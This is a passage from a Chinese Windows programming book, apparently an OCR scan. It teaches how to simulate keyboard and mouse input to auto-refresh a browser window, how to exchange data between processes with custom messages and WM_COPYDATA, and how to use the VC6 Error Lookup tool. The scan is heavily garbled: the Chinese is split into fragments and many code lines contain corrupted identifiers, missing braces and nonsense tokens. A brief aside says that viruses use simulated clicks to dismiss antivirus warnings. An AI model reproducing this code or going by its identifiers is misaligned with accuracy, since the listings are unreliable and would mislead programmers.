口 句柄 , 在 MEC 的 内 部 已 经 维护 了 一 个 m hWnd 的 句柄 变量 (如 果 想 要 查看 或 使 用 MFC 内 
部 维护 的 m_hWnd 成 员 变 量 ， 可 以 直接 使 用 它 ， 也 可 以 通过 调用 GetSafeHwnd0 成 员 函 数 来 
得 到 它 ， 推 荐 使 用 第 二 种 方法 )。 

在 按钮 事件 中 添加 定时 器 ， 那 么 定时 器 会 按照 指定 的 时 间 间 隔 进行 相应 的 处 理 。 定 时 器 
部 分 的 代码 如 下 : 


void CKeyBoardDlg:; :OnTimer (UINT nTIDEvent) 


// 在 此 处 添加 处 理 程序 代码 


HWND hWnd = ::;FindWindow (NULL, mStrCaption.GetBuffer(0)); 
// 发 送 键 往 按 下 消息 

::PostMessage (hWnd, WM KEYDOWN, VK_F5, 1); 

Sleep (50); 


// 发 送 键盘 抬 起 消息 
::PostMessage (hWnd, WNM_ KEYUP, VEK_FS5, 1); 


CDialog: :OnTimer (nIDEvent); 


} 

关于 定时 器 的 处 理 非常 简单 ， 通 过 FindWindow() 函 数 得 到 要 刷新 窗口 的 句柄 ， 然 后 发 送 
WM_KEYDOWN 和 WM_KEYUP 消息 来 模拟 键盘 按键 即 可 。 其 实在 模拟 的 过 程 中 ， 可 以 省 去 
WM_KEYUP 消息 的 发 送 ， 但 是 为 了 模拟 效果 更 接近 真实 性 ， 建 议 在 模拟 时 将 消息 成 对 发 送 。 

将 写 好 的 程序 编译 连接 后 运行 起 来 看 效果 ， 在 “IE 浏览 器 标题 ”处 输入 浏览 器 的 标题 ， 这 
个 标题 可 以 通过 Spy++ 获 得 ， 然 后 在 “刷新 频率 ”处 输入 1。 然 后 单 击 “开始 ”按钮 ， 观 察 浏 
览 器 每 个 1 秒 进行 刷新 一 次 。 当 单 击 “ 停 止 ”按钮 后 ， 程 序 不 再 对 浏览 器 进行 刷新 按键 模拟 。 
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到 此 ， 通 过 PostMessage() 函 数 发 送 按 F5 键 进行 键盘 按键 模拟 的 程序 就 完成 了 。 使 用 
PostMessage() 函 数 的 好 处 是 目标 窗口 可 以 在 后 台 ， 而 不 需要 窗口 处 于 激活 状态 。 可 以 将 被 刷 
新 的 浏览 器 最 小 化 , 然后 运行 刷新 网 页 的 小 程序 , 在 任务 栏 可 以 看 到 浏览 器 仍然 在 不 断 刷新 。 


1.3.2 通过 API 函数 模拟 鼠标 键盘 按键 的 操作 


在 开发 程序 时 ， 总 是 依靠 发 送 消息 是 非常 辛 昔 的 事情 ， 因 为 消息 的 类 型 非常 多 ， 并 且 不 
同 消 息 的 附件 参数 也 因 不 同 的 消息 类 型 而 异 。Windows 几乎 为 每 个 常用 的 消息 都 提供 了 相应 
的 API 函数 。 为 了 不 必 记 忆 过 多 的 消息 ， 使 用 API 函数 进行 开发 是 相对 比较 直观 的 。 

1. 鼠标 键盘 按键 模拟 函数 

在 使 用 Windows 的 系统 消息 进行 模拟 鼠标 或 键盘 按键 操作 时 ， 可 能 显得 不 直观 ， 也 不 方便 。 
微软 公司 在 进行 设计 时 已 经 考虑 到 了 这 点 ， 因 此 在 Windows 下 的 大 部 分 消息 都 可 以 直接 使 用 对 
应 的 等 价 API 函数 ， 不 必 直 接 通 过 发 送 消 息 。 比 如 可 以 用 WM_GETTEXT 消息 去 获取 文本 的 内 
容 ， 对 应 的 函数 有 GetWindowText()。 试 想 一 下 ， 如 果 程 序 中 一 眼看 去 都 是 SendMessage() 与 
PostMessage() 之 类 的 函数 ， 岂 不 是 很 吓人 。 

本 节 介 绍 两 个 函数 ， 分 别 用 来 模拟 鼠标 和 键盘 的 输入 ， 它 们 分 别 是 keybd_event() 和 
mouse event()， 定 义 如 下 : 

VOID keybd event ( 

BYTE bVk, 
BYTE 了 Scany 
DWORD dwFlags, 
ULONG PTR dwExtralnfo 
mouse event( 
DWORD GQGwFlags, 
DWORD dx, 
DWORD dy, 
DWORD dwData, 
ULONG PTR dwExtraIinfo 

) 

从 函数 的 名 称 就 能 看 出 ， 这 两 个 API 函数 分 别 对 应 的 是 键盘 事件 和 鼠标 事件 ， 在 程序 里 
使 用 时 ， 对 于 阅读 代码 的 人 来 说 就 比较 直观 了 。 下 面 将 使 用 keybd event() 和 mouse_ event() 
两 个 函数 来 完成 上 一 小 节 编 写 的 刷新 网 页 的 小 工具 。 

2. 网 页 刷新 工具 

keybd_event(0 和 mouse_event() 这 两 个 API 函数 ， 从 函数 的 参数 上 来 看 ， 不 需要 给 它们 传 
递 窗口 句柄 当 作 参 数 。 那 么 这 两 个 函数 在 进行 鼠标 和 键 
盘 的 模拟 时 就 必须 将 目标 窗口 激活 并 处 于 所 有 窗口 的 最 
前 端 。 因 此 在 程序 中 首先 要 完成 的 是 将 目标 窗口 设置 到 
最 前 面 ， 并 且 处 于 激活 状态 。 先 来 看 一 下 程序 的 界面 部 
分 ， 如 图 1-11 所 示 。 

这 次 的 窗口 相 比 上 个 程序 的 窗口 要 简单 些 。 在 界面 上 
有 两 个 按钮 , 第 1 个 按钮 “模拟 键盘 ”是 通过 keybd_event() 
来 模拟 按 FS 键 从 而 刷新 网 页 ， 第 2 个 按钮 “模拟 鼠标 ” 
是 通过 mouse_event() 来 模拟 鼠标 右键 ， 从 而 弹出 浏览 器 的 快捷 菜单 ,再 通过 keybd_event0 模 拟 





IDC_EDIT_CAPTION 


图 1-11 模拟 鼠标 键盘 
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按 R 键 来 刷新 网 页 。 
知道 了 程序 要 实现 的 功能 ， 先 来 完成 将 目标 窗口 设置 到 最 前 面 并 处 于 激活 状态 的 部 分 ， 第 
代码 如 下 : 章 
VOID CSimIAputDLg' :rindaAndFocus() 
{ 
GetDlgrtemText (LIDO EDIT CAPTION, m Streaption)y 
// 判断 输入 是 否 为 空 编 
if \( m StrCaption == "" 程 
' 入 
二 et 门 
} 
m hWnd = ::FindWindow(NULL, m strcaption.GetBuffer(0)); Ps 


// 该 函数 将 创建 指定 窗口 的 线程 设置 到 前 台 
// 并 且 激 活该 窗口 
:svSetForegroundWindow (m PhWnad) ， 

} 


这 个 自 定义 函数 非常 简单 , 分 别 调用 了 FindWindow() 和 SetForegroundWindow() 两 个 API 
函数 。FindWindow() 函 数 在 前 面部 分 已 经 介绍 过 了 。SetForegroundWindow(0) 函 数 的 使 用 比较 
简单 ， 它 会 将 指定 的 窗口 设置 到 最 前 面 并 处 于 激活 状态 ， 该 函数 只 有 1 个 参数 ， 是 目标 窗口 
的 窗口 句柄 (这 里 的 窗口 句柄 变量 m_ hWnd 就 是 前 面 提 到 的 由 MEFC 提供 的 变量 ， 该 值 也 可 
以 使 用 GetSafeHwnd() 函 数 来 进行 获取 ， 这 点 前 面 已 经 说 过 了 ， 读 者 可 以 自行 测试 )。 

“模拟 键盘 ”按钮 对 应 的 代码 如 下 : 


void CSimIinputDlg: :OnBtnSsimkeybd () 


We 
A 反 

/7 将 其 设置 到 前 台 并 激活 
FindAndFocus(); 

Sleep (1000); 


// 模拟 F5 三 次 
keybdirevent (VK FS 0, 0, 0) 7; 
Sleep (1000); 
kevbalevent lV ES OO DDN 
sieep(1000); 
keybd event (VK_F5, 0, 0, 0); 

















} 

在 进行 模拟 键盘 按键 前 ， 首 先 要 调用 自 定义 函数 FindAndFocus() 将 浏览 器 设置 到 最 前 面 
并 处 于 激活 状态 〈 在 “模拟 鼠标 ”按钮 中 同样 要 先 调用 FindAndFocus() 自 定义 函数 )。 通 过 调 
用 keybd_event() 函 数 来 模拟 F5 键 进行 了 3 次 网 页 的 刷新 。 

“模拟 鼠标 ”按钮 对 应 的 代码 如 下 : 


void CSimInputDlg: :onBtnsirmmouse() 


// 在 此 处 添加 处 理 程序 代码 
FindAndFocus () ， 


// 得 到 窗口 在 屏幕 的 坐标 (x， y) 
了 ON = DO hs 
“:ClientToScreen(m hWnd, &pt); 


// 设置 鼠标 位 置 
SetCGursorPos(pt. x tT 36r Ppt.y T3995) 


/7 模拟 单 击 鼠 标 右键 
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// 单 击 鼠 标 右键 后 ， 浏 览 器 会 弹出 快捷 菜单 

mouse event (MOUSEEVENTF RIGHTDOWN,; 0,; 0, 0, 0); 
Sleep(100); 

mouse event (MOUSEEVENTF RIGHTUP, 0, 0, 0, 0)» 


Sleep(1000); 
// 0x52 = R 二 
// 在 弹出 右键 菜单 后 按 下 RR 键 
/7 会 刷新 页 面 
keybd event (0x52，0，0，0)7 
} 
代码 中 用 到 了 两 个 陌生 的 API 函数 ， 分 别 是 ClientToScreen 0 和 SetCursorPos()。 它 们 的 
定义 如 下 : 
BOOL ClientToScreen! 


HWND hWnd, // handle to window 
LPPOINT ipPoint // screen coordinates 





) ; 
ClientToScreen() 函 数 的 作用 是 将 窗口 区 域 的 坐标 转换 为 屏幕 的 坐标 。 更 直接 的 解释 是 ， 
得 到 指定 窗口 在 屏幕 中 的 坐标 位 置 。 


BOOL SetCursorPos ( 
int X7  // horizontal position 
nt // vertical position 


); 

SetCursorPos() 函 数 的 作用 是 将 鼠标 光标 移动 到 指定 的 坐标 位 置 。 

在 程序 中 为 什么 不 使 用 mouse_event0 来 移动 鼠标 光标 的 位 置 ， 而 是 使 用 SetCursorPos() 的 位 置 
呢 ? 在 API 函数 中 ， 与 SetCursorPos() 对 应 的 一 个 函数 是 GetCursorPos()， 而 SetCursorPos0) 函 数 往 
往 会 与 GetCursorPos0 函 数 一 起 使 用 。 因 为 在 很 多 情况 下 ， 程 序 设 置 鼠标 光标 位 置 进行 一 系列 操作 
后 ， 仍 需要 将 鼠标 光标 的 位 置 设置 回 原来 的 位 置 ， 那 么 在 调用 SetCursorPos() 前 ， 就 需要 调用 
GetCursorPos() 得 到 鼠标 光标 的 当前 位 置 , 这 样 才 可 以 在 操作 完成 后 把 鼠标 光标 设置 为 原来 的 位 置 。 
由 此 也 可 以 看 出 ， 很 多 API 函数 是 成 对 出 现 的 ， 有 Set 也 有 Get， 这 样 在 记忆 的 时 候 非常 的 方便 。 

在 程序 中 调用 SetCursorPos() 函 数 时 ， 参 数 中 的 x 坐标 和 y 华 标 分 别 加 了 两 个 整 型 的 常量 ， 
这 里 可 能 比较 费解 。 这 两 个 整 型 常量 的 作用 是 通过 ClientToScreen() 函 数 得 到 的 是 浏览 器 左上 
角 的 x 和 yy 坐标 ， 而 浏览 器 的 鼠标 右键 菜单 必须 在 浏览 器 的 客户 区 中 才能 激活 ， 因 此 需要 在 
左上 角 坐 标的 基础 上 增加 两 个 偏 移 ， 代 码 里 的 两 个 整 型 常量 就 是 一 个 偏 移 〈 这 里 的 偏 移 值 可 
以 自己 随意 修改 ， 只 要 保证 鼠标 能 够 落 在 浏览 器 窗口 中 即 可 )。 


当 ， 林 绪 
对 于 鼠标 和 键盘 按键 的 模拟 在 很 多 地 方 都 会 使 用 ， 比 如 有 的 病毒 用 模拟 鼠标 单 击 杀毒 软 
件 的 警告 提示 ， 比 如 游戏 辅助 工具 通过 模拟 鼠标 进行 快速 单 击 …… 对 于 鼠标 和 键盘 按键 的 模 


拟 并 不 简单 。 在 常规 的 情况 下 , 可 以 通过 上 面 介 绍 的 内 容 来 进行 鼠标 和 键盘 按键 的 模拟 操作 。 
但 是 对 于 有 些 情况 就 不 行 了 ， 比 如 有 些 游戏 过 滤 了 PostMessage0) 函 数 发 送 来 的 消息 ， 有 些 游 
戏 hook 了 keybd_event0 和 mouse_eventO 函 数 ， 有 些 游戏 使 用 了 DX 来 响应 鼠标 和 键盘 …… 


1.4 通过 消息 实现 进程 间 的 通信 


在 很 多 软件 中 需要 多 个 进程 协同 工作 ， 而 不 是 单一 的 进程 进行 工作 。 那 么 多 进程 的 协同 
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工作 就 涉及 进程 间 的 通信 。 在 Windows 下 ， 进 程 间 的 通信 有 多 种 实现 的 方法 ， 比 如 管道 、 邮 
槽 、 剪 贴 板 、 内 存 共享 …… 前 面 介 绍 了 Windows 的 消息 机 制 ， 本 节 主 要 介绍 通过 消息 实现 进 
程 间 的 通信 ， 通 过 知识 的 连贯 性 将 前 面 的 知识 加 以 应 用 与 提升 。 

通过 消息 进行 进程 间 的 通信 ， 有 一 定 的 限制 性 。 根 据 前 面 介绍 的 内 容 ，Windows 下 有 窗 
口 的 应 用 程序 是 基于 消息 驱动 进行 工作 的 ， 那 么 没有 窗口 的 程序 就 不 是 基于 消息 驱动 来 进行 
工作 的 。 对 于 非 窗口 的 应 用 程序 是 无 法 通过 消息 进行 进程 间 通 信 的 。 

通过 消息 实现 进程 间 的 通信 在 本 节 中 介绍 两 种 方法 ， 一 种 是 通过 自 定义 消息 进行 进程 间 
的 通信 ， 另 一 种 是 通过 使 用 WM_COPYDATA 消息 进行 进程 间 的 通信 。 


1.4.1 通过 自 定 义 消息 进行 进程 通信 


消息 分 为 两 种 ， 一 种 是 系统 已 经 定义 的 消息 ， 另 一 种 是 用 户 自 定义 的 消息 。 系 统 已 经 定义 的 
消息 是 从 0 到 0x3 企 ， 用 户 自 定义 的 消息 可 以 从 0x400 开始 。 系 统 中 提供 了 一 个 宏 WM_USER， 
在 进行 自 定 义 消 息 时 , 在 WM_USER 的 基础 上 加 一 个 值 就 可 以 了 。 下 面 来 实现 一 个 自 定 义 消 
息 完成 进程 间 通 信 的 程序 例子 。 

1. 实现 自 定义 消息 的 步骤 

根据 前 面 的 介绍 ， 我 们 知道 ， 通 过 自 定义 消息 进行 进程 间 通 信 ， 只 有 带 有 窗口 的 进程 才 
能 完成 基于 消息 的 进程 间 通 信 。 既 然 是 进程 间 通 信 ， 那 么 就 需要 至 少 编写 两 个 程序 ， 一 个 是 
接收 消息 的 服务 端 ， 另 一 个 是 发 送 消 息 的 客户 端 ， 并 且 这 两 个 程序 都 需要 有 窗口 。 

先 来 介绍 程序 的 功能 ， 在 发 送 消息 的 客户 端 ， 通 过 自 定义 消息 给 接收 消息 的 服务 端 发 送 
两 个 整 型 的 数值 。 接 收 消息 的 服务 端 ， 将 接收 到 的 两 个 数值 进行 简单 的 加 法 和 运算。 接收 消息 
的 服务 端 在 VC 下 , 使 用 MFC 通过 自 定 义 消 息 来 完成 进程 间 的 通信 需要 3 个 步骤 , 首先 要 定 
义 一 个 消息 , 其 次 是 添加 自 定 义 消 息 的 消息 映射 , 最 后 是 添加 消息 映射 对 应 的 消息 处 理 函 数 。 

首先 在 服务 端 和 客户 端 定义 一 个 消息 ， 有 具体 如 下 : 


#Gefine WM UMSG WM USER + 1 


然后 是 在 接收 消息 的 服务 端 添 加 消息 映射 ， 如 下 : 
BEGIN MESSAGE MAP (CUseérWMD1g, CDialog) 
//1{AFX MSG MAP (CUserWMD19g) 
ON WM SYSCOMMAND() 
ON_WM_ PAINT () 
ON_ WM QUERYDRAGICON () 
ON _ MESSAGE (WM_UMSG, ReveMsg) 
//}}AFX MSG MAP 
END MESSAGE MAP () 


在 这 个 消息 映射 中 ，ON _ MESSAGE(WM_UMSG, RevcMsg) 是 自 定义 消息 的 消息 映射 。 

最 后 在 接收 消息 的 服务 端 添 加 自 定义 消息 的 消息 响应 函数 。 根 据 消 息 映 射 可 以 得 知 ， 消 
息 响 应 函数 的 函数 名 为 ReveMsg()， 定 义 如 下 : 

VOID CUserWMD1g: :ReveMsg (WPARAM wParam, LPARAM JParam) 

, ee 

2. 完成 自 定义 消息 通信 的 代码 

对 于 如 何 完 成 自 定 义 消息 的 介绍 已 经 介绍 完了 ,现在 来 看 两 个 程序 的 窗口 界面 ， 如 图 1-12 
和 图 1-13 所 示 。 
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图 1-12 自 定义 消息 服务 端 (接收 端 ) 图 1-13 自 定义 消息 客户 端 ( 发 送 端 ) 


知道 了 两 个 程序 的 作用 以 及 窗口 的 界面 ， 那 么 开始 对 它们 分 别 进行 编码 。 首 先 来 看 自 定 
义 消息 服务 端的 代码 ， 该 部 分 的 代码 比较 简单 。 前 面 已 经 介绍 了 如 何 定 义 消息 ， 如 何 添加 消 
息 上 映射， 如何 添加 消息 响应 函数 。 现 在 只 需要 完成 消息 响应 函数 的 函数 体 即 可 。 消 息 响应 函 
数 代 码 如 下 : 


VOID CUserWMDig: :ReveMsg (WPARAM wParam,; LPFARAM lParam) 
{ 

int nNuml, nNuam2, nsSum; 

nNuml = (int)wParam; 

nNum2 = (int)lParam; 

nsum = nNuml + nNum2; 


CString str; 
str.Format ("$d", nSum); 


SetDlgItemText (IDC EDIT REVCDATA, str); 


E 

在 消息 响应 的 函数 中 有 两 个 参数 , 分 别 是 WPARAM 类 型 和 LPARAM 类 型 。 这 两 个 参数 
可 以 接收 两 个 4 字 节 的 参数 。 这 里 代码 中 接收 了 两 个 整 型 数值 ， 进 行 相 加 后 显示 在 了 窗口 上 
的 编辑 框 中 。 

在 发 送 消息 端 ， 也 需要 定义 相同 的 消息 类 型 。 这 里 不 再 重复 介绍 ， 只 要 把 响应 的 定义 复 
制 粘 贴 即 可 。 主 要 看 发 送 消 息 的 函数 ， 代 码 如 下 : 


void CUserWwMcDLg::onBtnsSend() 


// 在 此 处 添加 处 理 程序 代码 


int nNuml, nNum2; 


nNuml = GetDlgItemIint (IDC EDIT SENDDATA, FALSE, FALSE); 
nNum2 = GetDlgItemIint (IDC EDIT SENDDATA2, FALSE, FALSE); 


HWND hWnd = ; :FindWindow(NULL，" 自 定义 消息 服务 端 ") ; 
. ::SendMessage (hWnd, WM UMSG, (WPARAM) nNuml, (LPARAM)NNum2); 
通过 SendMessage(0) 函 数 完 成 了 发 送 ， 同 样 也 非常 简单 。 在 SendMessage() 函 数 中 ， 通 过 
第 3 个 参数 和 第 4 个 参数 将 两 个 整 型 值 发 送 给 了 目标 的 窗口 。 
从 自 定义 消息 的 例子 中 可 以 看 出 , 自 定义 消息 对 于 进程 间 的 通信 只 能 完成 简单 的 数值 型 的 
传递 ， 对 于 类 型 复杂 的 数据 的 通信 就 无 法 完成 了 。 那 么 ， 通 过 消息 是 否 能 完成 字符 串 等 数据 的 
通信 传递 呢 ? 答案 是 肯定 的 。 接 下 来 看 使 用 WM_COPYDATA 消息 完成 进程 间 通 信 的 例子 。 


1.4.2 通过 WM_COPYDATA 消息 进行 进程 通信 


自 定义 消息 传递 的 数据 类 型 过 于 简单 ， 而 通过 WM_COPYDATA 消息 进行 进程 间 的 通信 
会 更 加 灵活 。 但 是 由 于 SendMessage() 函 数 在 发 送 消 息 时 的 阻塞 机 制 ， 在 使 用 WM_COPYDATA 
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时 传递 的 消息 也 不 宜 过 多 。 

1. WM_COPYDATA 消息 介绍 

应 用 程序 发 送 WM_COPYDATA 消息 可 以 将 数据 传递 给 其 他 应 用 程序 。WM_COPYDATA 
消息 需要 使 用 SendMessage() 函 数 进行 太 送 ,而 不 能 使 用 PostMessage() 消 息 。 通过 SendMessage() 
函数 发 送 WM_COPYDATA 消息 的 形式 如 下 : 


SendMessage l( 
(HWND) hwnd; 
WM COPYDATA, 
(WPARAM) wParam, 
(LPARAM) lParam 
) 


第 1 个 参数 hWnd 是 接收 消息 的 目标 窗口 句柄 ;第 2 个 参数 是 消息 的 类 型 ， 也 就 是 当前 
正在 介绍 的 消息 WM_COPYDATA; 第 3 个 参数 是 发 送 消息 的 窗口 句柄 ; 第 4- 个 参数 是 一 个 
COPYDATASTRUCT 结构 体 的 指针 。 


COPYDATASTRUCT 结构 体 的 定义 如 下 : 
typedef struct tagCOPYDATASTRUCT 1 
ULONG PTR dwData; 
DWORD cbhData; 
PVOID lpData; 
} COPYDATASTRUCT,; *PCOPYDATASTRUCT; 


其 中 ，dwData 是 自 定义 的 数据 ，cbData 用 来 指定 lpData 指向 的 数据 的 大 小 ， lpData 是 
指向 数据 的 指针 。 

在 程序 中 , 发 送 WM_COPYDATA 消息 方 仍然 会 通过 调用 FindWindow() 函 数 来 查找 目标 
窗口 的 句柄 ， 而 接收 消息 方 需 要 响应 对 WM_COPYDATA 消息 的 处 理 。WM_COPYDATA 不 
是 自 定义 消息 ， 在 编程 时 不 必 像 自 定 义 消息 那样 需要 自己 定义 消息 和 添加 消息 映射 ， 这 部 分 
工作 可 以 直接 通过 MEC 辅助 进行 。 

MFC 添加 WM_COPYDATA 消息 响应 的 方法 如 下 : 

首先 在 要 啊 应 WM_COPYDATA 消息 的 窗口 对 应 的 类 上 单 击 鼠标 右键 , 在 弹出 的 快捷 菜单 
中 选择 “Add Windows Message Handler”， 如 图 1-14 所 示 。 选 择 该 菜单 项 后 会 出 现 如 图 1-15 
所 示 的 添加 消息 响应 函数 对 话 框 。 





_BTN_SEND 
IDC_EDIT_ SENDDATA 
IDC_LIST_REQ 
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图 1-14 选择 “Add Windows Message Handler” 图 1-15 添加 消息 响应 函数 对 话 框 
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在 “New Windows messages/events:” 列 中 找到 WM_COPYDATA 消息 ， 然 后 双击 将 它 添 
加 到 “Existing message/event handlers:” 列 中 。 最 后 单 击 “Add Handler” 按 钮 ，MFC 就 自动 
生成 了 WM_COPYDATA 的 消息 映射 及 消息 响应 函数 。Windows 其 他 常用 的 消息 都 可 以 通过 
该 对 话 框 辅助 生成 消息 映射 及 消息 响应 函数 。 

2. WM_COPYDATA 程序 界面 及 介绍 

对 于 WM_COPYDATA 消息 ， 前 面 已 经 介绍 了 ,程序 同样 分 为 客户 端 程序 和 服务 端 程序 。 
首先 来 看 程序 运行 的 效果 ， 如 图 1-16 所 示 。 
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服务 端 程序 ， 甚 余 进程 都 向 它 发 送 消息 ”同一 个 程序 运行 的 3 个 实例 
图 1-16 WM_COPYDATA 的 服务 端 与 客户 端 界面 


WM_COPYDATA 的 服务 端 会 接收 WM_COPYDATA 消息 , 在 接收 到 WM_ COPYDATA 消息 进 
行 处 理 后 同样 会 发 送 一 个 WM_COPYDATA 消息 给 客户 端 进行 消息 反馈 。 WM_COPYDATA 的 客户 
端 会 通过 FindWindow() 函 数 来 查找 WM_COPYDATA 的 服务 端 ， 并 发 送 WM_COPYDATA 
消息 ， 同 样 也 会 接收 服务 端 发 来 的 WM_COPYDATA 消息 并 进行 处 理 。 

3，WM_COPYDATA 客户 端 程序 的 实现 

有 了 前 面 的 介绍 ， 现 在 我 们 就 来 完成 程序 的 编码 工作 ， 首 先 来 看 WM_COPYDATA 客户 
端 。 客 户 端的 界面 中 有 3 个 控件 ， 分 别 是 一 个 按钮 控件 、 一 个 编辑 框 控件 和 一 个 列表 框 控件 
(为 列表 框 控件 定义 一 个 控件 变量 : CListBox m_ListRec; )。 

WM_COPYDATA 客户 端的 代码 如 下 : 


void CCopyDataCDlg: :OnBtnSend() 


// 在 此 处 添加 处 理 程序 代码 
// 查找 接收 WM_CoOPYDATA 消息 的 窗口 句柄 
HWND hWnd = ::;FindWindow (NULL，"COPYDATA 服务 端 ") ; 


CString StrText? 





OD 








1.4 通过 消息 实现 进程 间 的 通信 





} 


GetDlgItemText (IDC EDIT SENDDATA, strText); 


// 设置 COBYDATASTRUCT 结构 体 
COPYDATASTRUCT cds; 


cds.dwData = 0» 
cds.cbData = strText.GetLength() + 1; 
cds.lpData = strText.GetBuffer(cds.cbData); 


// _m_hwnd 是 cwWnd 类 中 的 一 个 成 员 函 数 
// 表示 该 窗口 的 句柄 
::SendMessage (hWnd, WM COPYDATA, (WPARAM)m hWnd, (LPARAM)&cds); 


BOOL CCopyDataCDlg: :OnCopyData (CWnd* pWnd, COPYDATASTRUCT* pCopyDataStruct) 


} 


// 在 此 处 添加 处 理 程序 代码 或 者 调用 默认 方法 
// 处 理 服 务 端 发 来 的 WM_COPYDATA 消息 
CString strText; 
strText .Format ("服务 端 在 [%s] 接 收 到 该 消息 "，pCopyDataStruct->lpData); 
m ListRec.AddSstring (strText); 


return CDialog: :OnCopyData (pWnd, pCopyDataSsStruct); 


4. WM_COPYDATA 服务 端 程序 的 实现 


WM_COPYDATA 服务 端 有 两 个 控件 ， 分 别 是 一 个 列表 框 控件 和 一 个 按钮 控件 。 


框 控件 定义 一 个 控件 变量 : CListBox m_ListData。 


WM_COPYDATA 服务 端的 代码 如 下 : 
BOOL CCopyDatasDlg: :OnCopyData (CWnd* pWnd, COPYDATASTRUCT* pCopyDatastruct) 


} 


// 在 此 处 添加 处 理 程序 代码 或 者 调用 默认 方法 


CString strText; 


// 通过 发 送 消息 的 窗口 句柄 获得 窗口 对 应 的 进程 号 ， 即 PID 
DWORD dwPid = 0; 
::GetWindowThreadProcessId (pWnd->m hWnd, gdwPid); 


// 格式 化 字符 串 并 添加 至 列表 框 中 

strText.Format ("PID=[%d] 的 进程 发 来 的 消息 为 ，%s"， 
dwPid, pCopyDatastruct->lpData); 

m ListData.AddString(strText)} 


//Y 获取 本 地 时 间 
SYSTEMTIME st; 
GetLocalTime (&st); 


CSstring strTime; 
strTime.Format ("%02d:%02d:%02d”, st.wHour, st.wMinute, st.wSecond)’? 


// 将 本 地 时 间 发 送 给 客户 端 程序 
COPYDATASTRUCT cds; 


cds.dwData = 0; 
cds.cbData = strTime.GetLength() + 1; 
cds.lpData = strTime.GetBuffer (cds.cbData); 


// 注意 SendMessage() 函数 的 第 3 个 参数 为 NULL 
::SendMessage (pWnd->m hWnd, WM COPYDATA, NULL, (LPARAM) gcds); 


return CDialog: :OnCopyData(pWnd, pCopyDataStruct); 


void CCopyDatasDlg: :OnBtnDelall () 


{ 


为 列表 
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/7 在 此 处 添加 处 理 程序 代码 


// 清空 列表 框 内 容 
while ( m ListData.GetCount() ) 
{ 
m ListData.Deletestring (0); 
} 
} 


在 接收 消息 的 服务 端 调用 GetWindowThreadProcessId() 通 过 发 送 消息 的 窗口 得 到 了 发 送 
消息 的 进程 PID 号 ， 并 将 接收 消息 的 时 间 反 馈 给 了 发 送 消息 的 客户 端 。 

5: 小 结 

关于 WM_COPYDATA 的 服务 端 和 客户 端的 代码 都 有 比较 详细 的 注释 ， 因 此 没有 过 多 解 
释 。 这 里 需要 强调 一 点 ，WM_COPYDATA 消息 需要 两 个 附加 消息 ， 也 就 是 SendMessage() 函 数 
的 wParam 和 1Param 参数 都 需要 使 用 。wParam 参数 表示 发 送 消息 的 窗口 句柄 ， 但 是 该 参数 可 以 
省 略 ， 还 可 以 通过 类 型 转换 传递 其 他 数值 型 的 数据 。lParam 参数 是 COPYDAIASTRUCT 结构 体 
虽 针 类 型 ， 不 可 以 省 略 ， 和 否则 接收 WM_COPYDATA 消息 的 服务 端 会 无 法 响应 。 


1.5 VC 相关 开发 辅助 工具 


VC6 比 起 VS2005、VS2008 之 类 的 开发 工具 显得 小 巧 轻便 ， 非 常 适合 入 门 学 习 ， 对 于 真 
正 的 开发 也 豪 不 逊色 。 这 里 介绍 VC6 开发 环境 下 的 两 个 工具 , 一 个 是 比较 简单 且 需 要 经 常 使 
用 的 “Error Lookup”， 另 一 个 是 集成 在 VC 中 的 调试 器 (前 面 介绍 的 SPY++ 也 可 以 通过 VC6 
的 “ToolS” 菜 单 栏 找到 )。 除 了 这 两 个 VC 提供 的 工具 外 ， 我 们 还 会 介绍 另外 一 个 与 Error 
Lookup 工具 相似 的 工具 ， 即 Windows Error Lookup Tool。 


1.5.1 Error Lookup 工具 的 使 用 


Error Lookup 工具 可 以 在 VC6 的 “ToolS” 菜 单 中 找到 ， 它 可 以 对 GetLastError0 函 数 提 
供 的 出 错 代 码 进行 解释 ， 解 释 为 可 以 理解 的 文字 描述 。 下 面 通过 一 个 非常 简单 的 程序 来 解释 
该 工具 的 使 用 。 

例子 代码 如 下 : 


#inciude <windows.h> 
#include <stdio.h> 





int main'() 
HANDLE hFile = CreateFile("c:\\test,txt”, GENERIC READ, 
FILE SHARE READ, NULL, OPEN. EXISTING, 
FILE ATTRIBUTE NORMAL, NULL); 
if ( hFile == INVALID HANDLE VALUE ) 
printf ("Err Code = %d \r\n", GetLastError())’; 


return 0; 


} 
这 段 代码 非常 短小 ， 主 要 是 通过 CreateFile(0) 函 数 打开 一 个 已 经 存在 的 文件 ， 但 是 这 里 传 
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递 给 函数 的 第 1 个 参数 “ci\test.txt” 是 一 个 不 存在 的 文件 ， 那 么 CreateFile() 对 ci\\test.txt 文 
件 的 打开 必然 会 错误 。 当 打开 错误 时 ， 程 序 调用 GetLastError() 函 数 会 得 到 一 个 错误 码 ， 并 通 
过 printf() 进 行 输出 。 

编译 运行 这 个 程序 ， 看 到 命令 行 中 输出 字符 串 “Err Code = 2”， 说 明 GetLastError(0) 函 数 
得 到 的 错误 码 为 “2”。 有 了 这 个 错误 码 ， 通 过 VC6 的 “ToolS” 菜 单打 开 “Error Lookup” 工 
具 ， 在 “Value” 处 输入 “2”， 然 后 单 击 “Look up” 按 钮 ， 就 可 以 看 到 错误 码 的 解释 为 “ 系 
统 找 不 到 指定 的 文件 >， 如 图 1-17 所 示 。 

在 平时 写 程序 的 时 候 ， 要 养 成 对 函数 的 返回 值 进行 
判断 的 习惯 。 在 编写 程序 的 时 候 ， 当 调用 CreateFile() 
函数 时 ,指定 文件 的 参数 可 能 是 由 用 户 提供 的 。 而 当 用 
户 指定 的 文件 不 存在 时 ， 同 样 会 报错 。 在 代码 中 调用 0 
FormatMessage() 函 数 可 以 将 GetLastError() 函 数 的 错误 mae | [EE :让 | 0 5 
码 转换 为 错误 描述 。( 提 示 : 这 里 只 是 说 明 在 代码 中 如 何 
将 GetLastError() 的 错误 码 转 换 为 错误 描述 ,建议 在 真正 
写 程序 时 自行 对 用 户 的 输入 进行 判断 过 滤 ， 以 保证 程序 的 健壮 性 。) 


1.5.2 Windows Error Lookup Tool 工具 的 使 用 


Windows Error Lookup Tool 工具 是 第 三 方 的 Windows 错误 码 查 看 工具 。 该 工具 可 以 查看 
的 错误 码 的 类 型 有 4 类， 分 别 是 Win32、HRESULT、NTSTATUS、STOP。 随 着 Windows Error 
Lookup Tool 工具 版 本 的 更 新 , 支持 的 错误 码 的 数量 也 会 不 断 增 多 。 它 相当 于 一 个 功能 更 强大 
的 Error Lookup 的 增强 版 工具 。 

